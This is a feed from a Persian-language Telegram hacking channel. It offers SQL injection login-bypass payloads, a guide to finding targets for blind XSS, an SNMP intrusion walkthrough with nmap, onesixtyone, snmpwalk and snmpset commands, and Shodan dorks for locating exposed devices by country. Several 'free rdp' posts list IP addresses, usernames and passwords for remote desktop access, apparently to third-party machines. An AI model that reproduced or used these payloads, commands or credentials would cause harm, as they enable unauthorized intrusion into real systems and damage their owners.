BlackCode | کد سیاه
2.79K subscribers
140 photos
23 videos
74 files
103 links
Download Telegram
سلام به همه
در رابطه با by pass صفحه لاگین ادمین بعضی از صفحات با بعضی از کلمات کیلیدی by pass میشن

لیست کلمات :
' or 1=1 limit 1 -- -+
'="or'
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
=——————————————————-=
#blackcode

➡️ @ir_blackcode
7
رفقای گل گلاب
تا اینجای کار چطوره؟
8😈4
اقا بلاخره گیت هابمون هم راه اندازی شد🥳

از این به بعد ابزار های خفن تر تو راهه 😈

github : https://github.com/IR-BlackCode
6🔥3
چطوری فرم های آسیب پذیر برای حمله Blind XSS پیدا کنیم ؟ 🤔 🧐


1. اول وارد وب سایت https://dorkking.blindf.com میشیم ⚡️⌨️
2. دامنه هدف رو بدون "https://" وارد میکنیم ⚡️🌐
3. رو Next کلیک میکنیم ⚡️ ⚪️
4. هر 5 تا دورک برای پیدا کردن فرم ها طراحی شدن ⚡️ 😎


#آموزشی

| • چنل بلک کد💀•|


⚫️ @ir_blackcode
🔥5
آموزش پروتکل SNMP و روش های نفوذ


🔹 SNMP چیست؟


SNMP (Simple Network Management Protocol)

پروتکلی در لایه Application است برای مدیریت و مانیتورینگ تجهیزات شبکه (روتر، سوئیچ، سرور...)

پورت‌ها: 161 (درخواست/پاسخ) ، 162 (Trap)

اجزا:

Manager (NMS): نرم‌افزار مدیریت

Agent: روی دستگاه نصب است

MIB: پایگاه داده شامل OID ها


نسخه‌ها:


v1 و v2c → ناامن (Community String ساده: public, private)

v3 → امن (رمزنگاری + احراز هویت)



---

🔹snmp مراحل تست نفوذ



1. شناسایی سرویس

nmap -sU -p 161 --script=snmp-info <IP>

→ گرفتن اطلاعات پایه (OS، اینترفیس‌ها، uptime).


2. cra__ck Community String


onesixtyone -c dict.txt <IP>

→ تست رشته‌های رایج مثل public و private.


3. استخراج اطلاعات (Enumeration)


snmpwalk -v2c -c public <IP>

→ نمایش جدول ARP، کاربران، Routing table و …


4. سوءاستفاده از دسترسی (Exploitation)

اگر Community String سطح Read-Write پیدا شود:

snmpset -v2c -c private <IP> <OID> type value

→ امکان تغییر پورت‌ها یا تنظیمات دستگاه.


5. SNMPv3
امن‌تر است، اما اگر رمز ساده باشد قابل Brute Force:

snmpwalk -v3 -u admin -a SHA -A pass -x AES -X key <IP>

#آموزشی
#آموزش پروتکل SNMP

| • چنل بلک کد 💀•|
🔹 @ir_blackcode
🔥3
🔎 دُورک‌های SNMP در Shodan


🎯 پورت‌ها


port:161
port:162

→ پیدا کردن سیستم‌هایی که SNMP باز دارن.



---

🎯 پروتکل / سرویس


"SNMPv1"
"SNMPv2"
"SNMPv3"

→ فیلتر بر اساس نسخه SNMP.


---

🎯 ترکیب پورت + نسخه


port:161 "SNMPv2"
port:161 "SNMPv3"


---

🎯 فیلتر به کشور


port:161 country:IR
port:161 country:US


---

🎯 فیلتر به سازمان / ISP


port:161 org:"Cisco"
port:161 org:"Huawei"

---

🎯 مثال‌های ترکیبی


port:161 "public"
port:161 "private"

#دورک
#Dork
| • بلک کد 💀•|

🔹 @ir_blackcode
🔥5
IP : 95.78.164.39:3389

USER : Бух1

PASS : 123QWEasd
__________________________👾
#free rdp

@ir_blackcode
🤝5
IP : 81.200.30.101:3389

USER : alena

PASS : 1q2w3e4R
__________________________👾
#free rdp

@ir_blackcode
👍5
IP : 84.253.115.142:55338

USER : user1

PASS : 123456
__________________________👾
#free rdp

@ir_blackcode
🤝6
IP : 198.54.129.116:3389

USER : Administrator

PASS : 123456
__________________________👾
#free rdp

@ir_blackcode
👍4🔥1
📺 تکنیک Session Hijacking 📺

دقیقاً همون داستان کوکی و توکنه. هکر کوکی مرورگرتو برمی‌داره → میره با همون وارد حسابت میشه.


📺 تکنیک Malicious Extensions 📺

یه افزونه مثلاً برای دانلود ویدیو از یوتیوب می‌زنه → تو نصب می‌کنی → پشت پرده همه رمزها و کوکیاتو می‌فرسته براش.


📺 تکنیک Phishing + Browser Exploit 📺

یه لینک برات می‌فرستن (مثلاً لاگین بانکت) → تو باز می‌کنی → یه باگ مرورگر یا یه اسکریپت اجرا میشه → دیتا از مرورگرت کشیده میشه بیرون.


📺 تکنیک Browser Sync Attack (حمله به سینک مرورگر) 📺

اگه تو Chrome یا Edge گزینه‌ی Sync فعاله → دیتات (پسورد، کوکی، تاریخچه) تو کلوده. هکر به اکانتت دسترسی بگیره → همه‌چی دستشه.



اینا فقط یسری از این نوع حملات هستن همه چی به خلاقیت خود هکر بر میگرده اولین قدم هک خلاقیت شماس ! 🖥

.|بلک کد|.
🏴‍☠️
@ir_blackcode
🔥51
راه های تکثیر ویروس چیست؟ معرفی 3 روش تکثیر ویروس

💻☠️
کثیر از طریق رسانه ها : منظور از رسانه ها رادیو و تلوزیون و اینترنت نیست ، منظور ما Physical Media یا رسانه های فیزیکی مثل CD و DVD و Flash Memory ها و هارد دیسک های اکسترنال و بصورت کلی هر وسیله ای که حافظه دارد است . حتی دوربین شما هم ممکن است باعث انتشار ویروس شود. این روش یکی از موثرترین روش های تکثیر اکثر ویروس ها است و به محض اینکه شما یکی از این رسانه ها را به یک سیستم متصل کنید و در صورتیکه قابل نوشتن باشد بلافاصله ویروس آنرا تشخیص داده و به داخل آن می رود تا به کامپیوتر دیگر منتقل شود.

👾👾
تکثیر از طریق ایمیل و شبکه های اجتماعی و پیام رسان ها : یکی از بهترین روش های انتقال ویروس از طریق فایل ، انتقال از طریق شبکه های اجتماعی و پیامرسان هاست ، ویروس براحتی خودش را در قالب یک پیام از طرف شما برای دوستان شما ارسال می کند و خودش را یک پیام از طرف یک دوست معرفی می کند و دوستان شما را تحریک به کلیک کردن یا دانلود و نصب فایل ویروسی می کنند. در عین حال دسترسی پیدا کردن به لیست ایمیل دوستان و ارسال شدن توسط ابزارهای ارسال ایمیل مثل Outlook یکی دیگر از روش های مرسوم انتقال ویروس است

🤖👾
تکثیر از طریق شبکه های اشتراک فایل Peer to Peer : شبکه های اشتراک فایل Peer To Peer یکی از خطرناک ترین محیط ها برای کاربران اینترنتی است و به دلیل عدم وجود هرگونه نظارت بر روی محتوای آنها و به اشتراک گذاری قسمتی از هارد دیسک شما در این شبکه ها ، ویروس ها بستری امن برای انتقال پیدا می کنند. از جمله معروف ترین این شبکه ها می توان به شبکه های تورنت ( Torrent ) و ابزارهایی مثل Emule و Kaazaa اشاره کرد.


.|چنل بلک کد|.
@ir_blackcode
👍4👾1
برای Bypass آپلودر ها از این پسوند ها استفاده کنید

|چنل بلک کد😈|

○| @ir_blackcode |○
6
سلام به همه بچه های بلک کد
خیلی مخلصیم
اقا ما یه اسیب پذیری xss از یه سایتی زدیم که رفتیم بهشون گزارش کردیم گفتن برامون مهم نیست خلاصه که فرهنگ باگ بانتی هنوز تو ایران جا نیوفتاده و الکی فقط وقت ادم میره😕

همین دیگه ...
اها راستی از یه سایت دیگه هم باگ زدم برای گزارش اونم میرم ببینم چی میشه خبرشو براتون میزارم
ایشالا به بانتی میرسیم😂

چنل بلک کد📌
@ir_blackcode
👏72🫡2🔥1😁1
سلام به همه رفقای چنل امیدوارم حالتون عالی باشه
آقا ما به این سایت هم پیام دادیم ولی گفتن که برنامه ای برای باگ بانتی ندارن

مطالب و آموزش های خفن دیگه تو راهه...

|☠️چنل بلک کد☠️|
@ir_blackcode
👍41
روز برنامه‌نویس مبارک ! 🎉

|از طرف تیم بلک کد❤️😊|
🔜 @ir_blackcode
5🔥3
پخش زنده شبکه اینترنشنال هک شد

توسط گروه هکری حنظله

@ir_blackcode
🔥81
5 سیستم عامل مناسب امنیت سایبری


☠️& @ir_blackcode &☠️
🔥4